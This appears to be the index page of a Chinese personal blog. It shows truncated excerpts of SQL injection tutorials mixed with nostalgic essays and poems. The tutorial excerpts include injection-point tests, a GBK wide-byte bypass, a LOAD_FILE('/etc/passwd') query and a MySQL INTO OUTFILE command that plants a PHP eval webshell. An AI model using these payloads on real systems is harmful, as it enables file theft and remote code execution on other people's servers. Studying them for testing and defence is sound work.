深入浅出SQL注入

03月26日

1.判断有无注入点 数字型:and 1=1 and 1=2 和 ‘ 字符型:’and ‘1’=’1? ‘and ‘1’=’2 搜索型:关键字%’ and 1=1 and ‘%’=’%??? 关键字%’ and 1=2 and ‘%’=’% 大部分数...

SQL注入-详细攻略

03月25日

‘ //单引号报错,转义 %bf%5c%27 //宽字节注入,数据库编码为GBK时,%bf%5c认为是一个字节,绕过PHP正则 UNION ALL SELECT LOAD_FILE(‘/etc/passwd’)– //读取系统...

那年花季少年。

03月25日

那一年,我们十六、七岁,每天没心没肺的笑着,笑容里带着的忧伤却没有人懂得。(你懂个锤子) 那一年我们十六、七岁,正处在叛逆的季节,想与父母好好的相处,却总是...

恋上蒲公英

03月24日

高二,同桌为他初恋写的一首诗,现在早已物是人非   你还没懂 我的生活 我也没说 我的困惑 我的记忆 停在拥抱时刻 你的回忆 都是我们犯的错 对不起 我的爱 是否...

MySQL-SQL语法总结

03月24日

1、建表格: create table table_name( column1 datatype [not null] [not null primary key], column2 datatype [not null], …); 说明: datatype –是资料的格式,...

MYSQL-简单的一句话木马

03月24日

  通过MySQL命令,INTO OUTFILE 执行导出数据,生成一句话木马在服务端,命令如下: 第一种: select ‘<?php @eval($_POST[pass]);?>’INTO ...

是时间?还是距离?让我们越走越远?

03月23日

真不敢相信,自己以前那么傻X(捂脸哭ing) 周末极度无聊并且睡不着,就去翻自己曾经的QQ空间,不知道自己以前是单纯还是蠢,做过那么多啼笑皆非的事,真不敢想象自...

最美的期待

03月21日

我有一个梦像雨后彩虹 用所有泪水换来笑容 还有一种爱穿越了人海 拾起那颗迷失的尘埃 你的呼吸越靠越近 将我抱紧 我睁开双眼想你在身边 无所谓永远...

MySQL盲注-时间延迟

03月20日

sqlmap支持使用–Techniques “T”指定时间延迟注入,节省sqlmap使用其他注入测试时间, 然后就是伪静态指定位置注入,在注入参数中加*(不能去掉参数值),如果有token...

loading